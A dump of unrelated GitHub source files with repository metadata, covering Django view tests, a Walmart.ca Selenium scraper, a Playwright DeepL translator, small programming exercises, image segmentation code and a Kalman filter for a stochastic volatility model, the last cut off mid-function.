self.assertEqual(response.status_code, 405)\n\n def test_result(self):\n \"\"\"\n Test result url (/results/) (after search product)\n - status_code (200)\n - if method is get\n - if method is post -> check result\n \"\"\"\n url_result = reverse(\"results\")\n response = self.client.get(url_result)\n self.assertEqual(response.status_code, 200)\n\n # form = SearchProduct(data={'product': 'Pizza test'})\n response = self.client.post(url_result, {\"product\": \"Pizza test\"})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"products/result.html\")\n self.assertIn(\"Pizza fromage\", response.content.decode(\"utf-8\"))\n\n response = self.client.post(url_result, {\"product\": \"toto\"})\n self.assertEqual(response.status_code, 200)\n\n self.assertIn(\"produit non trouvé\", response.content.decode(\"utf-8\"))\n\n def test_product_info(self):\n \"\"\"\n Test page product info\n - status_code (200)\n \"\"\"\n\n product = Product.objects.first()\n url = f\"/products/{product.id}/\"\n response = self.client.get(url)\n self.assertEqual(response.status_code, 
200)\n self.assertTemplateUsed(response, \"products/product.html\")\n\n response = self.client.get(\"/products/232323/\")\n self.assertEqual(response.status_code, 200)\n\n def test_save_product(self):\n \"\"\"\n Test save product\n - status_code (200) auth or not auth\n - if method is get\n - if method is post -> check result\n \"\"\"\n product_test = Product.objects.first()\n response = self.client.post(\"/products/save/\", {\"product_id\": product_test.id})\n self.assertEqual(response.status_code, 302)\n\n self.client.force_login(User.objects.get_or_create(username=\"bob\")[0])\n response = self.client.post(\"/products/save/\", {\"product_id\": product_test.id})\n self.assertEqual(response.status_code, 302)\n\n response = self.client.get(\"/accounts/products/\")\n self.assertIn(product_test.name, str(response.content))\n\n response = self.client.post(\"/products/save/\", {\"product_id\": 999})\n self.assertEqual(response.status_code, 404)\n\n def test_list_product(self):\n \"\"\"\n Test list product (/list_product/)\n - status_code (200, 301)\n \"\"\"\n response = self.client.get(\"/list_product/\")\n self.assertEqual(response.status_code, 200)\n\n # Check if len products is 4\n self.assertEqual(len(response.context[\"products\"]), 4)\n\n # Check template used\n self.assertTemplateUsed(response, \"products/list_product.html\")\n\n response = self.client.post(\"/legal/\")\n self.assertEqual(response.status_code, 405)\n\n def test_delete_product_save_success(self):\n \"\"\"\n Test delete product save\n \"\"\"\n # Create 1 product save for user \"bob\"\n\n self.client.force_login(User.objects.get_or_create(username=\"bob\")[0])\n user = User.objects.filter(username='bob').first()\n self.add_product_1.user_save.add(user)\n\n # Request post for delete product 1\n url = f\"/products/{self.add_product_1.id}/\"\n response = self.client.post(url, {\"product_id\": self.add_product_1.id})\n self.assertEqual(response.status_code, 302)\n self.assertEqual(len(user.user_save_products.all()), 0)","repo_name":"Eolynas/pur_beurre","sub_path":"product/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11182698981","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\nimport time\n\nPATH = \"/opt/anaconda3/bin/chromedriver\"\ndriver = webdriver.Chrome(PATH)\n\ndriver.get(\"https://www.walmart.ca/en/lounge-co/N-1275528\")\n\nfile = []\nfile.append([\"product_name\", \"price\", \"available_online\", \"available_instore\", \"rating\", \"num_reviews\"])\n\ntry:\n\tshelfThumbs = WebDriverWait(driver, 10).until(\n\t\tEC.presence_of_element_located((By.ID, \"shelf-thumbs\"))\n\t)\n\tarticles = shelfThumbs.find_elements_by_tag_name(\"article\")\n\ttime.sleep(1)\n\n\tfor article in articles:\n\t\tname = article.find_elements_by_class_name(\"thumb-header\")[0].text\n\t\trating = article.find_elements_by_class_name(\"ratings\")[0].find_elements_by_tag_name(\"div\")[0].get_attribute(\"class\")\n\t\tnum_reviews = article.find_elements_by_class_name(\"review-count\")[0].text\n\t\tprice = article.find_elements_by_class_name(\"price-current\")[0].find_elements_by_tag_name(\"div\")[0].text.replace(\"\\n\", \"\")\n\t\tavailable_online = 
article.find_elements_by_class_name(\"availability-messages\")[0].find_elements_by_tag_name(\"div\")[0].find_elements_by_tag_name(\"span\")[0].text\n\t\tavailable_instore = article.find_elements_by_class_name(\"availability-messages\")[0].find_elements_by_tag_name(\"div\")[1].text\n\t\t\n\t\tfile.append([name, price, available_online, available_instore, rating, num_reviews])\n\n\n\n\nfinally:\n\tdriver.quit()\n\tdf = pd.DataFrame(file)\n\tdf.to_csv(\"Walmart_Lounge_and_Co.csv\", index=False)","repo_name":"Isaac-Muscat/Programming-Experience-and-Resources","sub_path":"WebScrapingProjects/Web_Scraping_Walmart/WS_Selenium.py","file_name":"WS_Selenium.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"19337460883","text":"# Modify the previous program, interleaving 3 vectors of 10 elements each.\n\nvetorA = []\nvetorB = []\nvetorC = []\nvetorD = []\nprint('Vetor A')\nfor a in range(10):\n vetorA.append(int(input(f'Vetor A | {a+1}º número: ')))\nprint('*' * 28)\nprint('Vetor B')\nfor b in range(10):\n vetorB.append(int(input(f'Vetor B | {b+1}º número: ')))\nprint('*' * 28)\nprint('Vetor C')\nfor c in range(10):\n vetorC.append(int(input(f'Vetor C | {c+1}º número: ')))\nfor d in range(10):\n vetorD.append(vetorA[d])\n vetorD.append(vetorB[d])\n vetorD.append(vetorC[d])\nprint('Vetor A -->', end=' ')\nfor i, a in enumerate(vetorA):\n if i < len(vetorA) - 1:\n print(f'{a} |', end=' ')\n else:\n print(a)\nprint('Vetor B -->', end=' ')\nfor i, b in enumerate(vetorB):\n if i < len(vetorB) - 1:\n print(f'{b} |', end=' ')\n else:\n print(b)\nprint('Vetor C -->', end=' ')\nfor i, c in enumerate(vetorC):\n if i < len(vetorC) - 1:\n print(f'{c} |', end=' ')\n else:\n print(c)\nprint('Vetor D -->', end=' ')\nfor i, d in enumerate(vetorD):\n if i < len(vetorD) - 1:\n print(f'{d} |', end=' ')\n else:\n print(d)\n\n","repo_name":"prmmendes/Python-Exercicios","sub_path":"4.11_listas.py","file_name":"4.11_listas.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"30021382298","text":"from . 
import model\nfrom sklearn.feature_selection import RFE\nfrom ufc_predictor import util\n\n\nclass LogisticRegressionModel(model.ModelInterface):\n def __init__(self, clf):\n self.clf = clf\n self.fit_support = None\n\n def fit(self, X, y):\n # Use Recursive Feature Elimination for feature selection\n rfe = RFE(self.clf)\n fit = rfe.fit(X, y)\n self.fit_support = fit.support_\n # filter to only the significant variables\n X = X[:, fit.support_]\n X = util.add_bias(X)\n self.clf.fit(X, y)\n\n def predict(self, future_X):\n return self.clf.predict(future_X).tolist()\n","repo_name":"natebuel29/ufc-event-predictor","sub_path":"ufc_predictor/models/log_reg_model.py","file_name":"log_reg_model.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"408780753","text":"import re\nimport time\nimport math\nfrom datetime import datetime\nfrom threading import Thread\n\n\ncs_str = \"\"\"Thermo Scientific (c) 2011\n Versa Star Pro \nMeter S/N V14888\nSW Rev 11.30\nChannel 1\nProbe S/n XT3-11311\nModule S/n VA21265\nMethod 100\nCalibration Time 28-04-21,14:06\nUser ID LABUSER\n-- pH Calibration Report --\nPoint 1\npH 1.68\nmV 292.3\nTemperature 24.7 C (ATC)\nCalibration Type Manual\nPoint 2\npH 4.01\nmV 141.8\nTemperature 24.7 C (ATC)\nCalibration Type Auto\nPoint 3\npH 7.00\nmV -14.5\nTemperature 24.7 C (ATC)\nCalibration Type Auto\n\"\"\"\n\nnow = datetime.now()\nstart = time.perf_counter()\n\n\ndef manipulate_str(cs_str):\n\ttokens = re.split(\" |\\n\", cs_str)\n\n\tnow = datetime.now()\n\tfile = open(f\"test-{now.strftime('%d-%m-%Y@%H-%M')}.txt\", \"a+\")\n\t# write out only the tokens that contain a digit\n\tfor i in tokens:\n\t\tif bool(re.search(r'\\d', i)):\n\t\t\tfile.write(f\"{i}\\n\")\n\tfile.close()\n\n\n# partial factorial products handed back by the worker threads\nresults = []\n\n\ndef factorial(num_range):\n\tprint([*num_range])\n\tfact = 1\n\tfor i in num_range:\n\t\tfact *= i\n\tresults.append(fact)  # collect the partial product for the main thread\n\n\t# fact = 1\n\t# for i in range(1, num+1):\n\t# \tfact *= i\n\treturn fact\n\n\t# print(f\"Factorial of {num} is {fact}\")\n\t# math.factorial(num)\n\n\nnum = -1\nwhile num < 1:\n\ttry:\n\t\tnum = int(input(\"Enter Positive Integer Number to Find Factorial: \"))\n\texcept ValueError:\n\t\tpass\n\n\nth = len(str(num))\nthread_slices = [range(1, num+1)[i::th] for i in range(th)]\nprint(thread_slices)\n\nthreads = []\nfactoid = 1\n\nfor each in thread_slices:\n\tt = Thread(target=factorial, args=[each], )\n\tt.start()\n\t# factoid *= t\n\t# print(dir(t))\n\tthreads.append(t)\n\n\n\nfor thread in threads:\n\tthread.join()\n\tprint(thread.daemon)\n\n\n# combine the partial products now that all threads have finished\nfor partial in results:\n\tfactoid *= partial\n\nprint(factoid)\n\n# f = Thread(target=factorial, args=[num]) # args=[i]\nm = Thread(target=manipulate_str, args=[cs_str])\n\n# f.start()\n# m.start()\n\n# f.join()\n# m.join()\n\n# factorial(i)\n\n# manipulate_str(cs_str)\n\nfinish = time.perf_counter()\n\nprint(f\"Time Elapsed - {round(finish-start, 2)} seconds\")","repo_name":"Not-Qualified/python","sub_path":"conc.py","file_name":"conc.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"19636820123","text":"import prime\nfrom itertools import count\n\nupto = 2000000\n\ndef gsum():\n s = 0\n g = prime.primes()\n for x in count():\n p = g.next()\n if p > upto:\n break\n s += p\n return s\n\ndef ssum():\n p = prime.sieve(upto)\n return 
sum(p)\n","repo_name":"karolciba/playground","sub_path":"projecteuler/problem_10_primes_sum.py","file_name":"problem_10_primes_sum.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"1200227338","text":"\"\"\"\nObjective\nToday we're expanding our knowledge of Strings and combining it with what we've already learned about loops. Check out the Tutorial tab for learning materials and an instructional video!\n\nTask\nGiven a string, S, of length N that is indexed from 0 to N-1, print its even-indexed and odd-indexed characters as space-separated strings on a single line (see the Sample below for more detail).\n\"\"\"\n\nif __name__ == \"__main__\":\n n = int(input())\n for i in range(0, n):\n string = str(input())\n string_list = list(string)\n evens = []\n odds = []\n for index, letter in enumerate(string_list):\n if index % 2 == 0:\n evens.append(letter)\n else:\n odds.append(letter)\n string_evens = ''.join(evens)\n string_odds = ''.join(odds)\n print('{} {}'.format(string_evens, string_odds))\n","repo_name":"brendanreardon/hackerrank","sub_path":"tutorials/30 days of code/06-review.py","file_name":"06-review.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"33956212083","text":"from sklearn import datasets\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\niris = datasets.load_iris()\n\nx = iris.data\ny = iris.target\n\nmodel = Sequential()\nmodel.add(Dense(8, input_dim=4, activation='relu'))\nmodel.add(Dense(8, activation='relu'))\nmodel.add(Dense(8, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\nmodel.compile(loss='binary_crossentropy',\n\t\t\t optimizer='adam', metrics=['accuracy'])\nmodel.fit(x, y, batch_size=15, epochs=150)\nscores = model.evaluate(x, y)\n\npredictions = model.predict(x)\n\nrounded = [round(p[0]) for p in predictions]\ncount = 0\n# compare the labels against the rounded predictions\nfor i in range(len(predictions)):\n\tif y[i] != rounded[i]:\n\t\tcount = count + 1\nprint('Number of wrong answers : {}'.format(count))\n","repo_name":"ayush1999/Keras-API","sub_path":"iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"70407675245","text":"import asyncio\nfrom typing import Any\nimport textwrap\n\nfrom install_playwright import install\nfrom playwright._impl._api_types import Error as PlaywrightError\nfrom playwright.async_api import async_playwright\nfrom .errors import DeepLError, DeepLPageError\n\nclass DeepL:\n fr_langs = {\n \"auto\",\n \"bg\",\n \"cs\",\n \"da\",\n \"de\",\n \"el\",\n \"en\",\n \"es\",\n \"et\",\n \"fi\",\n \"fr\",\n \"hu\",\n \"id\",\n \"it\",\n \"ja\",\n \"ko\",\n \"lt\",\n \"lv\",\n \"nl\",\n \"pl\",\n \"pt\",\n \"ro\",\n \"ru\",\n \"sk\",\n \"sl\",\n \"sv\",\n \"tr\",\n \"uk\",\n \"zh\",\n }\n to_langs = fr_langs - {'auto'}\n\n def __init__(self, fr_lang: str, to_lang: str, timeout: int = 15000) -> None:\n if fr_lang not in self.fr_langs:\n raise DeepLError(f\"{repr(fr_lang)} is not a valid language. Valid language:\\n\" + repr(self.fr_langs))\n if to_lang not in self.to_langs:\n raise DeepLError(f\"{repr(to_lang)} is not a valid language. 
Valid language:\\n\" + repr(self.to_langs))\n \n self.fr_lang = fr_lang\n self.to_lang = to_lang\n self.translated_fr_lang: str | None = None\n self.translated_to_lang: str | None = None\n self.max_lenght = 3000\n self.timeout = timeout\n self.common_text = \"\" \n\n async def __async_generator_split(self, string: str) -> str | None:\n buffer = textwrap.wrap(string, width=self.max_lenght, break_long_words=False)\n for line in buffer:\n yield line\n\n async def translate(self, string: str) -> str | None:\n return await self.__translate(string)\n \n async def install_browser(self) -> bool:\n async with async_playwright() as p:\n code = await asyncio.get_event_loop().run_in_executor(None, install, p.chromium)\n if code:\n return True\n else:\n return False\n \n async def check_browser_install(self) -> bool:\n async with async_playwright() as p:\n try:\n await self.__get_browser(p)\n except PlaywrightError as e:\n if \"Executable doesn't exist at\" in e.message:\n return False\n else:\n return True\n\n async def __translate(self, string: str) -> Any:\n async with async_playwright() as p: \n browser = await self.__get_browser(p)\n\n page = await browser.new_page()\n page.set_default_timeout(self.timeout)\n\n excluded_resources = [\"image\", \"media\", \"font\", \"other\"]\n await page.route(\n \"**/*\",\n lambda route: route.abort() if route.request.resource_type in excluded_resources else route.continue_(),\n )\n\n async for line in self.__async_generator_split(string=string):\n url = \"https://www.deepl.com/en/translator\"\n try:\n await page.goto(f\"{url}#{self.fr_lang}/{self.to_lang}/{line}\")\n page.get_by_role(\"main\")\n except PlaywrightError as e:\n msg = f\"Maybe Time limit exceeded. ({self.timeout} ms)\"\n raise DeepLPageError(msg) from e\n\n try:\n await page.wait_for_function(\n \"\"\"\n () => document.querySelector(\n 'd-textarea[data-testid=translator-target-input]')?.value?.length > 0\n \"\"\",\n )\n except PlaywrightError as e:\n msg = f\"Time limit exceeded. 
({self.timeout} ms)\"\n raise DeepLPageError(msg) from e\n \n input_textbox = page.get_by_role(\"region\", name=\"Source text\").locator(\"d-textarea\")\n output_textbox = page.get_by_role(\"region\", name=\"Translation results\").locator(\"d-textarea\")\n\n self.translated_fr_lang = str(await input_textbox.get_attribute(\"lang\")).split(\"-\")[0]\n self.translated_to_lang = str(await output_textbox.get_attribute(\"lang\")).split(\"-\")[0]\n\n res = str((await output_textbox.all_inner_texts())[0])\n res = res.replace(\"\\n\\n\", \"\\n\")\n\n self.common_text += f\"{res}\\n\"\n\n await browser.close()\n\n return self.common_text\n \n async def __get_browser(self, p: Any) -> Any:\n return await p.chromium.launch(\n headless=True,\n args=[\n \"--no-sandbox\",\n \"--single-process\",\n \"--disable-dev-shm-usage\",\n \"--disable-gpu\",\n \"--no-zygote\",\n ],\n )","repo_name":"Anton1802/TkDeepL","sub_path":"src/modules/deepl.py","file_name":"deepl.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"9399586584","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport time\nfrom skimage import exposure\nimport scipy.misc\nfrom setup import *\nfrom matching import segment_modules\n\n\n\n# read raw video data\n# input: raw video name with full path\ndef read_raw_video(raw_name):\n raw_size = os.path.getsize(raw_name)\n img_num = raw_size / (rows*cols*2) # 4 (32 bits) or 2 (16 bits)\n num = int(img_num)\n \n raw = open(raw_name, 'rb')\n f = np.fromfile(raw, dtype=np.uint16, count=rows*cols*num) # rows*cols*(offset+num)\n # normalize the intensities to be in [0,255]\n f = 255.*(f - f.min())/(f.max()-f.min())\n fm = [] \n for i in range(0,num):\n start = rows*cols*i\n end = rows*cols*(i+1)\n img = f[start:end].reshape(rows,cols)\n \n # contrast stretching\n p2, p98 = np.percentile(img, (2, 98))\n img = exposure.rescale_intensity(img, in_range=(p2, p98))\n \n fm1 =format(1000*compute_quality(img), '.5f')\n fm.append(str(i)+' '+fm1)\n \n segment(img, )\n \n #scipy.misc.imsave(raw_dir+str(i)+'.jpg', img) # save to jpg file \n \n # show the quality factor on the images\n #font = cv2.FONT_HERSHEY_SIMPLEX\n #cv2.putText(img, text, (0, 25),\n # cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255), 1)\n #cv2.imshow('Image', img)\n #cv2.waitKey(100)\n \n # save the quality factors of the images to a file\n with open(work_dir+os.path.basename(raw_name).split('.')[0]+'_quality.txt', 'w') as f:\n for s in fm:\n print(s, file=f)\n\n\n# segment all single modules \ndef segment_modules(img_dir, image_indices):\n for i in image_indices:\n img = cv2.imread(img_dir+str(i)+'.jpg', 0)\n save_path = raw_img_module+str(i)+'_'\n\ndef segment(img): #,save_path):\n gray = cv2.GaussianBlur(img,(3,3),0) \n thresh, result = cv2.threshold(gray,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n \n kernel = np.ones((11,11),np.uint8)\n open = cv2.morphologyEx(result,cv2.MORPH_OPEN,kernel)\n \n # detect connected components\n cc = cv2.connectedComponentsWithStats(open,8,cv2.CV_32S)\n \n stats = cc[2]\n ind = np.argsort(stats[:,-1]) # indices of all connected components\n max_components = []\n min_val = stats[ind[-2],-1]/1.8 # exclude background\n mod_num = 1 # number of modues inside the image\n\n for i in reversed(range(ind.size-1)):\n # check if touching the boarder: test left, right, up and down, and also min area\n if (stats[ind[i],0] != 0 and stats[ind[i],-1] >= min_val and \n (stats[ind[i],0]+stats[ind[i],2]) != 
img.shape[1] and\n (stats[ind[i],1] != 0) and\n (stats[ind[i],1]+stats[ind[i],3]) != img.shape[0]):\n #max_components.append((cc[1]==ind[i])*img)\n #cv2.imwrite(save_path+str(mod_num)+'.jpg', (cc[1]==ind[i])*img)\n mod_num += 1 \n\n\n# tracking all \ndef template_matching(template, img):\n h,w = template.shape\n res= cv2.matchTemplate(img, template, cv2.TM_CCORR_NORMED)\n \n # matching for only one object\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n #top_left = max_loc\n #bottom_right = (top_left[0] + w, top_left[1] + h)\n #cv2.rectangle(img,top_left, bottom_right, 255, 2)\n #print(res.max())\n #print(top_left)\n \n plt.subplot(121),plt.imshow(res,cmap = 'gray')\n plt.title('Matching Result'), plt.xticks([]), plt.yticks([])\n plt.subplot(122),plt.imshow(img,cmap = 'gray')\n plt.title('Detected Point'), plt.xticks([]), plt.yticks([])\n #plt.show()\n \n return round(max_val,4)\n\n\n# transform all the single module images \n# TODO: add the case for only illustration - no need to perform transformation\ndef perspective_all(dir_module, only_for_center):\n # for all the modules iamges, compute the perspective transform\n for filename in sorted(os.listdir(dir_module), key=lambda x: (int(x.split('_')[0]), int(x.split('.')[0].split('_')[1]))):\n video = video_process(dir_module+filename)\n video.segment(video.origin_img)\n \n corners = video.houghLine(video.module_thresh)\n video.perspective(video.origin_img, corners, dims)\n #cv2.imwrite(match_persp+os.path.splitext(filename)[0] + '.jpg', video.persp_img)\n \n # save the centroids of these modules for later use, i.e. \n # illustration of modules @show_modules\n # and also acting as a reference point for transformation\n center = video.center_of_module\n n1, _ = filename.split('_')\n\n if n1 in centers:\n centers[n1].append(center)\n else:\n centers[n1] = [center]\n \n \n # save the perspectively transformed images as a whole image, not just a single module \n img = np.zeros_like(video.origin_img)\n x0, y0 = img.shape\n x1, y1 = video.persp_img.shape\n \n # Get the left and upper corner of the module in the transformed image by\n # checking if touching left, upper, right, down\n top_left = [max(center[0]-x1/2., 0), max(center[1]-y1/2., 0)]\n top_left = [min(top_left[0], x0-1-x1), min(top_left[1], y0-1-y1)]\n top_left = np.array(top_left).astype(int)\n \n img[top_left[0]:top_left[0]+x1, top_left[1]:top_left[1]+y1] = video.persp_img.copy() \n \n cv2.imwrite(match_persp_full + os.path.splitext(filename)[0] + '.jpg', img)\n\n# find out the images that correspond to the same module with very high probability, e.g. 
0.8\ndef classfy_modules(save_with_prob):\n # performing classification for the modules\n dir_to_match = match_persp_full\n img_names = sorted(os.listdir(dir_to_match), key=lambda x: int(x.split('_')[0]))\n ref_img = img_names[0]\n ref_name = os.path.splitext(ref_img)[0] # with extension - '.jpg'\n if save_with_prob == True: # for later consistency\n ref_name = '('+ref_name+', 1.0)' \n\n results = {1:[ref_name]} # default: for template\n template = cv2.imread(dir_to_match+ref_img,0)\n \n for filename in img_names:\n img = cv2.imread(dir_to_match+filename,0)\n #img = cv2.equalizeHist(img)\n val = os.path.splitext(filename)[0]\n best_match = 0.\n best_key = 0\n for key in results:\n #template = cv2.imread(dir_to_match+results[key][0]+'.jpg', 0) # not so good\n if save_with_prob == True:\n temp_name = results[key][-1].split(',')[0].split('(')[1] # if with prob\n else:\n temp_name = results[key][-1] # default: without prob \n template = cv2.imread(dir_to_match+temp_name+'.jpg', 0) # much better\n\n res = template_matching(template, img)\n #print(res)\n if res > best_match:\n best_match = res\n best_key = key\n \n if best_match > 0.8:\n if save_with_prob == True:\n val = '('+val+', '+str(best_match)+')' # with probabilities\n results[best_key].append(val)\n else: \n if save_with_prob == True:\n val = '('+val+', '+str(best_match)+')' # with probabilities \n results[len(results)+1] = [val] \n \n return results \n","repo_name":"faujpli/zae_test","sub_path":"src/all_process.py","file_name":"all_process.py","file_ext":"py","file_size_in_byte":7305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38576362231","text":"from typing import Generator\n\nimport pandas as pd\nfrom pandas import DataFrame\nfrom tqdm import tqdm\n\nfrom consts.data_consts import SPOTIFY_ID, ID\nfrom consts.language_consts import LANGUAGE, SCORE\nfrom consts.path_consts import SHAZAM_TRACKS_IDS_PATH, SHAZAM_TRACKS_LANGUAGES_PATH, MUSIXMATCH_TRACKS_LANGUAGES_PATH, \\\n LANGUAGES_ABBREVIATIONS_MAPPING_PATH\nfrom consts.shazam_consts import SHAZAM_TRACK_KEY, APPLE_MUSIC_ADAM_ID\nfrom data_processing.pre_processors.language.language_record import LanguageRecord\nfrom data_processing.pre_processors.pre_processor_interface import IPreProcessor\nfrom utils.file_utils import read_json\n\nSHAZAM_KEY = 'shazam_key'\nSHAZAM_ADAMID = 'shazam_adamid'\nMUSIXMATCH_LANGUAGE = 'musixmatch_language'\nMUSIXMATCH_SCORE = 'musixmatch_score'\nRAW_LANGUAGE_COLUMN_NAMES = [\n LANGUAGE,\n SCORE,\n MUSIXMATCH_LANGUAGE,\n MUSIXMATCH_SCORE\n]\n\n\nclass LanguagePreProcessor(IPreProcessor):\n def __init__(self):\n self._languages_abbreviations_mapping = read_json(LANGUAGES_ABBREVIATIONS_MAPPING_PATH)\n\n def pre_process(self, data: DataFrame) -> DataFrame:\n data_with_shazam_ids = self._merge_shazam_tracks_ids_data(data)\n data_with_shazam_language = self._merge_lyrics_languages_data(data_with_shazam_ids)\n data_with_musixmatch_language = self._merge_musixmatch_language_data(data_with_shazam_language)\n language_data = self._create_data_with_single_language_column(data_with_musixmatch_language)\n language_data[LANGUAGE] = language_data[LANGUAGE].map(self._languages_abbreviations_mapping)\n\n return language_data\n\n @staticmethod\n def _merge_shazam_tracks_ids_data(data: DataFrame) -> DataFrame:\n shazam_tracks_ids_data = pd.read_csv(SHAZAM_TRACKS_IDS_PATH)\n shazam_tracks_ids_relevant_data = shazam_tracks_ids_data[[SHAZAM_TRACK_KEY, APPLE_MUSIC_ADAM_ID, SPOTIFY_ID]]\n 
shazam_tracks_ids_relevant_data.columns = [SHAZAM_KEY, SHAZAM_ADAMID, ID]\n shazam_tracks_ids_relevant_data.drop_duplicates(subset=ID, inplace=True)\n\n return data.merge(\n right=shazam_tracks_ids_relevant_data,\n how='left',\n on=[ID]\n )\n\n @staticmethod\n def _merge_lyrics_languages_data(data_with_shazam_ids: DataFrame) -> DataFrame:\n lyrics_data = pd.read_csv(SHAZAM_TRACKS_LANGUAGES_PATH)\n lyrics_data.rename(columns={SHAZAM_TRACK_KEY: SHAZAM_KEY}, inplace=True)\n lyrics_data.drop_duplicates(subset=SHAZAM_KEY, inplace=True)\n\n return data_with_shazam_ids.merge(\n right=lyrics_data,\n how='left',\n on=[SHAZAM_KEY]\n )\n\n @staticmethod\n def _merge_musixmatch_language_data(data_with_shazam_language: DataFrame) -> DataFrame:\n musixmatch_data = pd.read_csv(MUSIXMATCH_TRACKS_LANGUAGES_PATH)\n musixmatch_data.dropna(inplace=True)\n musixmatch_data.rename(columns={LANGUAGE: MUSIXMATCH_LANGUAGE, SCORE: MUSIXMATCH_SCORE}, inplace=True)\n musixmatch_data.drop_duplicates(subset=ID, inplace=True)\n\n return data_with_shazam_language.merge(\n right=musixmatch_data,\n how='left',\n on=[ID]\n )\n\n def _create_data_with_single_language_column(self, data: DataFrame) -> DataFrame:\n unique_songs_data = data.drop_duplicates(subset=ID)\n language_records = [record.to_dict() for record in self._generate_language_data_records(unique_songs_data)]\n language_data = pd.DataFrame.from_records(language_records)\n relevant_data = data.drop(RAW_LANGUAGE_COLUMN_NAMES, axis=1)\n\n return relevant_data.merge(\n right=language_data,\n how='left',\n on=[ID]\n )\n\n @staticmethod\n def _generate_language_data_records(data: DataFrame) -> Generator[LanguageRecord, None, None]:\n print('Starting to select final language from different sources')\n\n with tqdm(total=len(data)) as progress_bar:\n for i, row in data.iterrows():\n if not pd.isna(row[LANGUAGE]):\n yield LanguageRecord(\n id=row[ID],\n language=row[LANGUAGE],\n score=row[SCORE],\n lyrics_source='shazam'\n )\n\n elif not pd.isna(row[MUSIXMATCH_LANGUAGE]):\n yield LanguageRecord(\n id=row[ID],\n language=row[MUSIXMATCH_LANGUAGE],\n score=row[MUSIXMATCH_SCORE],\n lyrics_source='musixmatch'\n )\n\n progress_bar.update(1)\n\n @property\n def name(self) -> str:\n return 'language pre processor'\n","repo_name":"nirgodin/RadioStations","sub_path":"data_processing/pre_processors/language/language_pre_processor.py","file_name":"language_pre_processor.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"11654863923","text":"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport statsmodels.tsa.stattools as st\nfrom statsmodels.tsa.stattools import acf, pacf\nimport seaborn as sns\nfrom scipy.stats import norm\nfrom scipy.special import ndtri\nfrom scipy import optimize\n\n#a)/b)\nexchange = pd.read_excel(\"/Users/stephanweenk/Downloads/VU Amsterdam/Econometrie/Time Series Models/Syllabus, exercises, assignments/Assignment 2/SvData.xlsx\", delimiter = ';')\nexchange = exchange/100\nx = np.log((exchange-np.mean(exchange))**2)\nTime = len(x)\nY = x.values\n\nexchange_dem = exchange-np.mean(exchange)\n\n# State smoother\ndef state_smoother_SV(a, P, v, F, y, T, Z, K):\n n = len(y)\n # vectors to be filled\n Alpha_hat = np.zeros(n) # smoothed state\n L = np.zeros(n)\n r = np.zeros(n + 1) # state smoothing cumulant\n N = np.zeros(n + 1) # State variance cumulant\n V = np.zeros(n) # smoothed state variance\n\n for t in range(0, n):\n if not 
np.isnan(y[t]):\n L[t] = T - K[t] * Z\n else:\n L[t] = 1\n\n # Reverse recursion for cumulants\n for t in range(n - 1, -1, -1):\n if not np.isnan(y[t]):\n r[t] = Z * v[t] / (F[t]) + L[t] * r[t + 1]\n N[t] = Z ** 2 / F[t] + (L[t] ** 2) * N[t + 1]\n else:\n r[t] = r[t + 1]\n N[t] = (1 / F[t]) + (L[t] ** 2) * N[t + 1]\n\n # variance and state smoothing\n for t in range(0, n):\n V[t] = P[t] - (P[t] ** 2) * N[t]\n Alpha_hat[t] = a[t] + P[t] * r[t]\n\n return Alpha_hat, V, r, N, L\n\n\n# =============================================================================\n# Plot raw data\nplt.figure(1, figsize=(15,4))\nplt.plot(np.arange(len(exchange)), exchange_dem/100, linewidth=0.75, color = 'grey')\nplt.hlines(y=0, xmin=0, xmax=len(exchange), linewidth=1)\nplt.show()\n\n# Plot transformed data to make the SV model linear\nplt.figure(1, figsize=(15,4))\nplt.scatter(np.arange(len(x)), x, s = 4, color = 'black')\n#plt.hlines(y=0, xmin=0, xmax=len(x), linewidth=1)\nplt.show()\n\nlog_ret_df = pd.DataFrame(exchange)\nstats = log_ret_df.describe()\nstats.loc[8] = log_ret_df.median()\nstats.loc[9] = log_ret_df.skew()\nstats.loc[10]= log_ret_df.kurtosis()\nstats.rename(index={8: 'median',9: 'skewness',10: 'kurtosis'})\n\n\n# c)\n# Kalman filter\ndef Kalman_Filter_SV(y, H, Q, phi, R, Z, a_1, P_1, d, omega): ### Note that time is len(x)\n # Construct vectors\n n = len(x)\n a = np.zeros(n)\n a[0] = a_1\n P = np.zeros(n)\n P[0] = P_1\n v = 